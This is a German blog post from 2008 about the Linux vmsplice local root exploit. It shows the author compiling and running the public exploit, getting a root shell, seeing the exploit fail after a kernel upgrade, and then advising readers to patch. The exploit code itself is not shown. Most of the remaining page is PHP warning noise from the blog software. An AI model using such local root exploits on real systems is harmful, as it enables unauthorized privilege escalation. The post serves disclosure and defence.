Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
541
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
11
02
2008
Der ein oder andere wird es schon auf
heise.de oder auf
milw0rm.com selbst gelesen haben. Es sind zwei lokale
Root-Exploits aufgetaucht, die es einem eingeschränkten Benutzer ermöglichen nach Ausführung des Exploits sich mit Root-Privilegien zu bewegen.
Die Lücke soll wohl in der aktuellen Kernel-Version (Kernel 2.6.24.2) behoben sein:
splice: fix user pointer access in get_iovec_page_array()
patch 712a30e63c8066ed84385b12edbfb804f49cbc44 in mainline.
Commit 8811930dc74a503415b35c4a79d14fb0b408a361 ("splice: missing user
pointer access verification") added the proper access_ok() calls to
copy_from_user_mmap_sem() which ensures we can copy the struct iovecs
from userspace to the kernel.
But we also must check whether we can access the actual memory region
pointed to by the struct iovec to fix the access checks properly.
Die Lücke beruht auf einen Fehler mit der erst in Kernel 2.6.17
eingeführten Funktion
vmsplice. Mehr dazu ist dem
Heise Security Eintrag zu entnehmen. Somit sind erst Kernel-Versionen größer 2.6.17 von dieser Lücke betroffen.
Wie gefährlich das Exploit ist, sieht man wenn man es selber ausprobiert hat. Es ist so einfach in der Handhabung, das es wahrscheinlich in nächster Zeit nur so von "Script-Kiddies" wimmeln wird, die sich selber profilieren wollen:
duddits@duddits ~/exploits/linux $ gcc -o expl kexp.c
kexp.c:12:22: Fehler: asm/page.h: Datei oder Verzeichnis nicht gefunden
kexp.c: In Funktion »main«:
kexp.c:193: Fehler: »PAGE_SIZE« nicht deklariert (erste Benutzung in dieser Funktion)
kexp.c:193: Fehler: (Jeder nicht deklarierte Bezeichner wird nur einmal aufgeführt
kexp.c:193: Fehler: für jede Funktion in der er auftritt.)
Beheben des Fehlers .....
duddits@duddits ~/exploits/linux $ gcc -o expl kexp.c
duddits@duddits ~/exploits/linux $
duddits@duddits ~/duddits@duddits ~/exploits/linux $ ./expl
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d83000 .. 0xb7db5000
[+] root
duddits linux # id
uid=0(root) gid=0(root) Gruppen=10(wheel),18(audio),19(cdrom),85(usb),1000(duddits)
duddits linux # whoami
root
Dies hatte ich an meinem Desktop-PC ausprobiert, als ich noch Kernel-Version 2.6.22-gentoo-r5 laufen hatte. Erst nach einer Aktualisierung auf die neuste Kernel-Version funktionierte das Exploit nicht mehr:
duddits linux # echo sys-kernel/gentoo-sources ~x86>>/etc/portage/package.keywords
duddits linux # emerge -av sys-kernel/gentoo-sources
These are the packages that would be merged, in order:
Calculating dependencies... done!
[ebuild NS ] sys-kernel/gentoo-sources-2.6.24-r2 USE="-build -symlink" 45,708 kB
Total: 1 package (1 in new slot), Size of downloads: 45,708 kB
Would you like to merge these packages? [Yes/No] Yes
...
nach der Konfiguration und einem reboot
...
~/duddits@duddits ~/exploits/linux $ ./expl
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d83000 .. 0xb7db5000
[-] vmsplice: Bad address
Daher sollte jeder, sofern er die Möglichkeit hat, auf die neuste Kernel-Version updaten/patchen. Falls einem diese Möglichkeit verwehrt bleibt, sollte man die Benutzer auf dem System so einschränken, das diese keine Möglichkeit zum Kompilieren haben. Weiterhin sollte auch das Laden des vorkompilierten Exploits nicht möglich sein, auch wenn das in der Praxis nur schwer zu realisieren ist.
Kommentare :
Noch keine Kommentare »
Kategorien : Operating Systems
Trackbacks :
Keine Trackbacks »
Ansicht der Kommentare:
(
Linear | Verschachtelt)
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_comments.inc.php on line
292
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Only variables should be assigned by reference in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
73
Kommentar schreiben
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
560
Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in
/www/htdocs/w0072ee3/blog/include/db/mysql.inc.php on line
270
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_config.inc.php on line
506
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::enum_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
951
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_s9ymarkup::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_s9ymarkup/serendipity_event_s9ymarkup.php on line
146
Strict Standards: Declaration of serendipity_event_s9ymarkup::uninstall() should be compatible with serendipity_plugin::uninstall(&$propbag) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_s9ymarkup/serendipity_event_s9ymarkup.php on line
146
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_emoticate::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_emoticate/serendipity_event_emoticate.php on line
204
Strict Standards: Declaration of serendipity_event_emoticate::uninstall() should be compatible with serendipity_plugin::uninstall(&$propbag) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_emoticate/serendipity_event_emoticate.php on line
204
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_nl2br::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_nl2br/serendipity_event_nl2br.php on line
162
Strict Standards: Declaration of serendipity_event_nl2br::uninstall() should be compatible with serendipity_plugin::uninstall(&$propbag) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_nl2br/serendipity_event_nl2br.php on line
162
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_browsercompatibility::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_browsercompatibility/serendipity_event_browsercompatibility.php on line
80
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spamblock/serendipity_event_spamblock.php on line
469
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spamblock/serendipity_event_spamblock.php on line
494
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spamblock/serendipity_event_spamblock.php on line
538
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spamblock/serendipity_event_spamblock.php on line
902
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_statistics::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_statistics/serendipity_event_statistics.php on line
1015
Strict Standards: Declaration of serendipity_event_statistics::uninstall() should be compatible with serendipity_plugin::uninstall(&$propbag) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_statistics/serendipity_event_statistics.php on line
1015
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spartacus/serendipity_event_spartacus.php on line
400
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spartacus/serendipity_event_spartacus.php on line
444
Strict Standards: Declaration of serendipity_event_spartacus::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spartacus/serendipity_event_spartacus.php on line
1183
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_config.inc.php on line
506
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/serendipity_config.inc.php on line
399
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/genpage.inc.php on line
31
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::count_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/genpage.inc.php on line
34
Strict Standards: Non-static method serendipity_plugin_api::count_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/genpage.inc.php on line
35
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
514
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
572
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
555
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
943
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
1026
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
1094
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_comments.inc.php on line
292
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Only variables should be assigned by reference in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
73
Strict Standards: Only variables should be assigned by reference in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
73
Strict Standards: Only variables should be assigned by reference in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
73
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
541
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Trackbacks
Strict Standards: Only variables should be assigned by reference in /www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line 73
Keine Trackbacks